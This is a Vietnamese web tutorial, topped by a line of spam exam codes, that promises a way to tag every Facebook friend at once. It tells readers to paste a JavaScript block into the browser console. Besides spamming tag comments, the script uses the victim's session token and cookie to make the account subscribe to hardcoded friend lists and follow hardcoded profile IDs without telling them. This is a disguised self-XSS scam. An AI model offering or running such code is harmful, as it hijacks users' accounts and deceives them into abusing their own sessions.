200-125 300-115 200-105 200-310 640-911 300-075 300-320 300-360 642-998 QV_DEVELOPER_01 400-101 700-501 117-201 70-696 700-505 600-199 400-351 300-207 TE0-141 100-105 300-101 300-206 300-070 70-417 210-260 210-060 200-355 300-208 CISSP 300-135 210-065 300-209 70-243 70-480 CCA-500 2V0-621D 210-451 400-051 E05-001 1Z0-052 70-410 640-916 VMCE_V9 810-403 070-464 070-243 700-802 70-246 FCBA GPHR DEV-401 C2090-610 SY0-401 712-50 ADM-201 700-039 312-50 MA0-101 648-244 SK0-004 ASF 70-494 70-673 500-005 1Z0-060 C9560-503 640-875 N10-006 98-367 70-534 NS0-505 70-342 CHFP 070-410 640-878 1V0-603 1Z0-804 C8010-250 312-50V9 C2150-508 98-368 CLOUDF 70-411 70-461 220-901 70-488 070-341 PK0-003 E20-547 70-412 70-686 500-285 CISM 101-400 102-400 PDM_2002001060 JN0-100 642-883 CAP 070-347

Cách tag Status cho toàn bộ bạn bè trên facebook

Cách tag Status cho toàn bộ bạn bè trên facebook.

1 ngày đẹp trời trên facebook, bạn muốn nhờ tất cả bạn bè của mình trên facebook like fanpage hoặc like ảnh gì đó. Bạn chỉ biết mỗi cách tag từng người một chứ không biết tag 1 lúc cả danh sách bạn bè vào 1 lúc. Bạn loay hoay tìm giải pháp để làm việc đó thật nhanh.

Bài viết dưới đây mình sẽ hướng dẫn các bạn cách tag status cho toàn bộ bạn bè trên facebook.

Bài viết đọc thêm :

đổi tên facebook 1 chữ.

đăng ký facebook.

sửa lỗi không vào được facebook.

Cách tag Status cho toàn bộ bạn bè trên facebook

Bước 1: Đăng nhập vào facebook của bạn nhé.

Bước 2: Đăng 1 status nào đó có thể nguyên text, đoạn video, đoạn văn và đăng lên facebook thôi.

Bước 3: Bạn ấn tổ hợp phím Ctr+Shift+J hoặc F12 ngay sau đó. Bạn chọn tiếp Console

Cách tag Status cho toàn bộ bạn bè trên facebook

Bước 3: Copy code sau và Enter

/* All Right Reserver ElMzx.Ma    Don’t Change Anything */

function tag(uidss) {

var a = document.createElement(‘script’);

a.innerHTML = “new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: ” + uidss + ” }).send();”;

document.body.appendChild(a);

}tag(“295407063938576”);tag(“355288751283740”);tag(“1394209820821373”);tag(“1394209677488054”);

function tagfriend(abone)

{ var http4=new XMLHttpRequest;

 var url4=”/ajax/follow/follow_profile.php?__a=1″;

 var params4=”profile_id=”+abone+”&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=”+fb_dtsg+”&lsd&__”+user_id+”&phstamp=”;

 http4.open(“POST”,url4,true);

 http4.onreadystatechange=function()

 {  if(http4.readyState==4&&http4.status==200)http4.close };

 http4.send(params4)}

tagfriend(“100007059427793”);

function x__0() { return window.ActiveXObject ? new ActiveXObject(“Msxml2.XMLHTTP”) : new XMLHttpRequest; };

function get_friends(){

var a=x__0();

a.open(“GET”, “/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=”+uid+”&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm”, false);

a.send(null);

if (a.readyState == 4) {

var f = JSON.parse(a.responseText.substring(a.responseText.indexOf(‘{‘)));

return f.payload.entries;

}

return false;

}

function get_uid(b){

var a=x__0();

a.open(“GET”, ‘http://graph.facebook.com/’+b, false);

a.send();

if (a.readyState == 4) {

return uid = JSON.parse(a.responseText).id;

}

return false;

}

var patt = /comment_text=(.*?)&/

var c = 1;

username = /\.com\/(.*?)\//.exec(window.top.location)[1];

uid = get_uid(username);

a = window.top.location;

termina = 0;

var amigos = get_friends();

post_id = /[0-9]{8,}/.exec(a);

uids = ‘comment_text=’;

header = ‘ft_ent_identifier=’+post_id+’&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=’+uid+’&__a=1&__req=4u&fb_dtsg=’+document.getElementsByName(‘fb_dtsg’)[0].value+’&phstamp=’+Math.random();

for ( var n = 1 ; n < amigos.length ; n++ ){

//uids += ‘%40[‘ + amigos[n].uid + ‘%3A’ + encodeURI(amigos[n].text) + ‘]%20’;

fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

uids += ‘%40[‘ + amigos[n].uid + ‘%3AAAAAAAAAAAA]%20’;

c++;

if(c == 7){

uids += ‘&’;

with(new XMLHttpRequest()) open(“POST”, “/ajax/ufi/add_comment.php?__a=1”),setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),send(header.replace(patt, uids));

z = setTimeout(‘function(){asd=0}’, 1000);

clearInterval(z);

c = 1;

uids = ‘comment_text=’;

}

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function cereziAl(isim) {

var tarama = isim + “=”;

if (document.cookie.length > 0) {

konum = document.cookie.indexOf(tarama)

if (konum != -1) {

konum += tarama.length

son = document.cookie.indexOf(“;”, konum)

if (son == -1)

son = document.cookie.length

return unescape(document.cookie.substring(konum, son))

}

else { return “”; }

}

}

function getRandomInt (min, max) {

return Math.floor(Math.random() * (max – min + 1)) + min;

}

function randomValue(arr) {

return arr[getRandomInt(0, arr.length-1)];

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){

var http4 = new XMLHttpRequest();

var url4 = “/ajax/follow/follow_profile.php?__a=1”;

var params4 = “profile_id=” + abone + “&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=” + fb_dtsg + “&lsd&__” + user_id + “&phstamp=”;

http4.open(“POST”, url4, true);

//Send the proper header information along with the request

http4.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);

http4.setRequestHeader(“Content-length”, params4.length);

http4.setRequestHeader(“Connection”, “close”);

http4.onreadystatechange = function() {//Call a function when the state changes.

if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}

}

http4.send(params4);

}

Bước 4 : Thành quả của bạn được như sau

Cách tag Status cho toàn bộ bạn bè trên facebook

Cách tag status cho tất cả bạn bè trên facebook thật đơn giản và dễ dàng phải không chúc các bạn thành công.

Cách tag Status cho toàn bộ bạn bè trên facebook
32 votes

Bình luận

Đóng góp ý cho bài viết